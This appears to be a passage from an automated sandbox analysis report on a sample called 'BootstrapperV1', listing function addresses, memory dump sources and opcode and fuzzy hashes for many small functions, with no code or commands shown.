                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 16eefe2c057c41860fd80300e80597ab2c2ec09d494d177b7db803281ad3b0fe
                                                                                                                                                                                                                                              • Instruction ID: bf2b0c850a87aa16a6b51ad35f25e519cfc6174eac795215a559b0f257f12dc4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16eefe2c057c41860fd80300e80597ab2c2ec09d494d177b7db803281ad3b0fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65F0C251B1DE1E1FE6D9BE7CA5163B8A2C1DB88132B5055BBD90DC2297EC19DC424344
                                                                                                                                                                                                                                              Function 00007FFB4B0FEEA2 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c152db5b43666bc0b39d95339068dd41cc50402147a964940257b13085c67508
                                                                                                                                                                                                                                              • Instruction ID: 07a84f14063eca0e68c417e3241e29eba6724c92af3bd8a9a730650013970262
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c152db5b43666bc0b39d95339068dd41cc50402147a964940257b13085c67508
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 531161E0A0E5C62FE746F3B845665B96FE19F4A241B0808FDC0CDDB6A3ED1858098311
                                                                                                                                                                                                                                              Function 00007FFB4B0E4B2D Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b4ed573771211e1951bc2ac2293d64fe28e03dda4b8bd0985bb29d1186f2f715
                                                                                                                                                                                                                                              • Instruction ID: 2b051cd5b8af1f4c6b45d5cda414893bc6c2775619dd4b9a0d7443ffc437a4f5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4ed573771211e1951bc2ac2293d64fe28e03dda4b8bd0985bb29d1186f2f715
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F501F48180EBC62FD3537B7C68602696FA48E4312670D41F7D1C8CB2E7D80C5845C3A2
                                                                                                                                                                                                                                              Function 00007FFB4B0ED0DD Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6b72bfebdcb1bde31e99f81ccbf832f4b6078d74c0f2ce8f8a9cb85443770496
                                                                                                                                                                                                                                              • Instruction ID: 557a6d040a1408410f1114306efa1698805b70c9742ec604a77026b5a723bf36
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b72bfebdcb1bde31e99f81ccbf832f4b6078d74c0f2ce8f8a9cb85443770496
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE0149A190DEC92FD796FB3894A42B57FE0EF82352F0841FED089C22A7DD1864468391
                                                                                                                                                                                                                                              Function 00007FFB4B0E4CD5 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e5c070f4b5715708ea5501b9e4729b93691bdb33d933c4107822267487cadd18
                                                                                                                                                                                                                                              • Instruction ID: fef62c7169cacb921e463248fe308b9a07f963024c63fb7a7ae59c75d6b08882
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5c070f4b5715708ea5501b9e4729b93691bdb33d933c4107822267487cadd18
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67F0B492A0ED8E2AE3966A3C69A51B85F82EB9656178903E3C18CC62E6DC0C5C424391
                                                                                                                                                                                                                                              Function 00007FFB4B0E4D31 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a7b18b738d9e2cbaa6d5ae77fe5dd0bc787c3fbc81c16e4ead04b9fce46c0928
                                                                                                                                                                                                                                              • Instruction ID: 68eafc81693d929018f2408a246e0cb3a9e63f942324cbf874835301cfbbdd40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7b18b738d9e2cbaa6d5ae77fe5dd0bc787c3fbc81c16e4ead04b9fce46c0928
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BF022B180C5CCAFD302AF7898095EEBFE0EF86100B0585EBE848C71A3D92825058742
                                                                                                                                                                                                                                              Function 00007FFB4B0EE5F1 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 417c87358f29b972f431497a676e9a08e2e8ab1e33ce8f794c127f7cf03ebee9
                                                                                                                                                                                                                                              • Instruction ID: 17a6eaa68c032b6449b6425a00b94ffb78c6f0f99db6986f07f5debbf596b367
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 417c87358f29b972f431497a676e9a08e2e8ab1e33ce8f794c127f7cf03ebee9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CF059C3D0DBDE1FD3A1E63CD9A81546BC1EF9916170C49F7C188C72A7EC0928418392
                                                                                                                                                                                                                                              Function 00007FFB4B0E7A50 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3fbfe54386938087983e3927b367992185f6d0fc7b569af977fb1a76f719f987
                                                                                                                                                                                                                                              • Instruction ID: 1283f094d033dfa96b5886f2a1fe7a6b30a28e959e6b97099ba0f8f58613f84c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fbfe54386938087983e3927b367992185f6d0fc7b569af977fb1a76f719f987
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2F0273170C80B1EE768B52DD609F7166D5EF993B2F25007AE54EC33E2DC99AC538280
                                                                                                                                                                                                                                              Function 00007FFB4B0E0924 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 59d1a9fe5c4d33bce526ad8a89c0a677b302b7f5bf686403cd6641f749900ce5
                                                                                                                                                                                                                                              • Instruction ID: f7e15252928e7e0db535283dfe6861396c9663ebef09fd1ef6df5806d5cf9b54
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59d1a9fe5c4d33bce526ad8a89c0a677b302b7f5bf686403cd6641f749900ce5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E01817180E7894FE7569BB488256E57FE1EF46310F0946EBD049CB2E3DA2818098B52
                                                                                                                                                                                                                                              Function 00007FFB4B0E0C24 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 501b3c8a9fccc2c431006636e77c225cd9f1fa58137c4746b1f2ac49a636cd88
                                                                                                                                                                                                                                              • Instruction ID: 3fda3589da2d02740546ece3e4f569824b98148783f1cebb0e4302fc3e27a433
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 501b3c8a9fccc2c431006636e77c225cd9f1fa58137c4746b1f2ac49a636cd88
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7401F96090D14A5FDB55EF34C0956BD7FF1DF01281F2444BEC04AC76A3D9245442CB00
                                                                                                                                                                                                                                              Function 00007FFB4B0F61C3 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 199a41338bcc3484f1b31a5b44f6ae1375bbf9624e652ea2d9faf1ee9b08ef58
                                                                                                                                                                                                                                              • Instruction ID: 3bd2ce654789de2a4f3c823c5e088438da20b87d40dbc00518a319010db2f20a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 199a41338bcc3484f1b31a5b44f6ae1375bbf9624e652ea2d9faf1ee9b08ef58
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBF0FE71A2CB489B9F04AE0CBC434AD77D0FB98B21F10116FFA4943211D621F9528AC7
                                                                                                                                                                                                                                              Function 00007FFB4B0EB252 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2d6bc23df946ec4985ea9a19002510c09bdbfe8188d8ed238130de20d12e1894
                                                                                                                                                                                                                                              • Instruction ID: 5515934b1caf728776510d598679418582bffc4855e3501a33b034a283b2f49b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d6bc23df946ec4985ea9a19002510c09bdbfe8188d8ed238130de20d12e1894
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC012D2040D6C61FD317AB3CC9955A47BE0EF45341B0941FAD5C8CF3A7D91CA8858751
                                                                                                                                                                                                                                              Function 00007FFB4B0E5859 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b0e56415f821996b0627671c4dafa2f81fb6d6f4cad0ec83d61c142344e4709d
                                                                                                                                                                                                                                              • Instruction ID: 9bb18089a1f1010b339dfcc690d94db1e187d9da7da356f63289ee80f8a9deed
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0e56415f821996b0627671c4dafa2f81fb6d6f4cad0ec83d61c142344e4709d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5801ADB081CBCD4FDB42EF7888681A9BFB0FF16200B0408EBD858D72A3DA799914C711
                                                                                                                                                                                                                                              Function 00007FFB4B0FBC3B Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: de52578382d4ccc7d34fbcaeedf1c5328341decf62b6ba6810272c956909e3e9
                                                                                                                                                                                                                                              • Instruction ID: 40b0fb19149faf0a14860a7e86a2b290ec7ec924032ec49c8bad96aaefd664a4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de52578382d4ccc7d34fbcaeedf1c5328341decf62b6ba6810272c956909e3e9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3F0A7F271CA1D4FA248BE2C69031BD73C2DBCA561710807FC58EC3262DD55680707C5
                                                                                                                                                                                                                                              Function 00007FFB4B0E4DCE Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5b1634d640fab113754b8e872173ca9822eeab8a942c27ddb31c0bc2f8d23cc3
                                                                                                                                                                                                                                              • Instruction ID: 7a53edf090897e9845008e1925ba45f815dd07c49048c5a98843d2ac2f8020b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b1634d640fab113754b8e872173ca9822eeab8a942c27ddb31c0bc2f8d23cc3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F0E992B0EE8B0BE799A53CE8405BDF380EF9525170445BEC009CA29ADD19594A4301
                                                                                                                                                                                                                                              Function 00007FFB4B0E0C97 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b6c557113f7e781f9f568d28cf46b8ea25cae536bada64299e3d40a5e60336a5
                                                                                                                                                                                                                                              • Instruction ID: 9d924a2309490a4e5b143d39dfef2bc485d22e71b6f46879d3c82dcc8b27172b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6c557113f7e781f9f568d28cf46b8ea25cae536bada64299e3d40a5e60336a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E01D6D0E1E1861EF716BBB4C5623B87B91AF42300F0044BED54D876E3DD1C28418315
                                                                                                                                                                                                                                              Function 00007FFB4B0E4135 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cb35915dd89c578b2672987c9bee8bf21d17dd992436d31a41e3a88004d0b13f
                                                                                                                                                                                                                                              • Instruction ID: 3242929b95512ed1ed379f2ae2e7208d9ec20eb1cf7fae1fbced8010ff871bea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb35915dd89c578b2672987c9bee8bf21d17dd992436d31a41e3a88004d0b13f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F09E9190C5250BEB22FE7CE2869FD77D0AF54311B0540F3E15DC72F2D904A8818395
                                                                                                                                                                                                                                              Function 00007FFB4B0E8310 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aba6597b980edb28d3a5b73d163e1c861c53b25ee63d1a0c9f82739786db0e36
                                                                                                                                                                                                                                              • Instruction ID: 6aa85f9e580b188a3a6a5b27d9fdbe2119607eecd8f3f1403299c5520063da86
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aba6597b980edb28d3a5b73d163e1c861c53b25ee63d1a0c9f82739786db0e36
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF02071A1CE0D2AD6A9FB3894447BA72D2EB85311F40417AE40EC23A5DE2868828380
                                                                                                                                                                                                                                              Function 00007FFB4B0E4180 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7f823444f92919883d2b5f517d2167fb4985d1e81024961be442f1dbcf2fa103
                                                                                                                                                                                                                                              • Instruction ID: ba0b98c80417e610dfbbabc2aab380cfac1a43f08a1ac277598216d8bfd1e292
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f823444f92919883d2b5f517d2167fb4985d1e81024961be442f1dbcf2fa103
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BE0D861B0C8294FDBF8FE6CA445AAC37D0EF4C38170140E6E84DC72B5D9409C8843C0
                                                                                                                                                                                                                                              Function 00007FFB4B0E04C0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3cbd97c03a6beb67969f9494da8dcfcb18b80962bbe74eb6574879dd8aa8d549
                                                                                                                                                                                                                                              • Instruction ID: 20d2be077420e1e0dae37e6ca1714ab7add011295cd0badccb2438ac74903aca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cbd97c03a6beb67969f9494da8dcfcb18b80962bbe74eb6574879dd8aa8d549
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DE02241B0D42906EA29727CB4903F937508F0622AF0840F6D88CC11D7DC891C4A02D9
                                                                                                                                                                                                                                              Function 00007FFB4B0F4CD1 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0f9b7a755a48b0ef78c6d69fdcb5dfd4bc5f38e77dad859ea9dc6731bcfb7412
                                                                                                                                                                                                                                              • Instruction ID: f54ce112231bb26e36a32cba283ae3e698fa57c044c9c78ab5a8e586920d4ac5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f9b7a755a48b0ef78c6d69fdcb5dfd4bc5f38e77dad859ea9dc6731bcfb7412
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBE0D83170C4054FE718FE2CD590AFC3352DB90322F14C23AC916C63E4DD98E4418780
                                                                                                                                                                                                                                              Function 00007FFB4B0E04C8 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 01e4f1920a3b16967daf8ac63556c487f1e630d4091e5534ee4ccabd137948b6
                                                                                                                                                                                                                                              • Instruction ID: 5079e8c76fdf6ff7ff350bf0f396c10b14f5b66f58e5f686aa8793b2ce9a213d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01e4f1920a3b16967daf8ac63556c487f1e630d4091e5534ee4ccabd137948b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CE0CD51E1D42501FA69757CF4917F937918F0A325F0840F6E89DD11CBDC8D2C8E02D9
                                                                                                                                                                                                                                              Function 00007FFB4B0E686B Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 27ca26091a51440a0afdbac1fdccd1c055c86d10edac9cc1250b6ac60396edf7
                                                                                                                                                                                                                                              • Instruction ID: bd3347415e2b9b858217742aaf53e539b936588edac59c232347349d5c6b4974
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27ca26091a51440a0afdbac1fdccd1c055c86d10edac9cc1250b6ac60396edf7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9E0DFA2D08E4DABD748EBB8C4865ECBBE2FF58220F0413F8C049B3281DC282402C740
                                                                                                                                                                                                                                              Function 00007FFB4B0FEF39 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
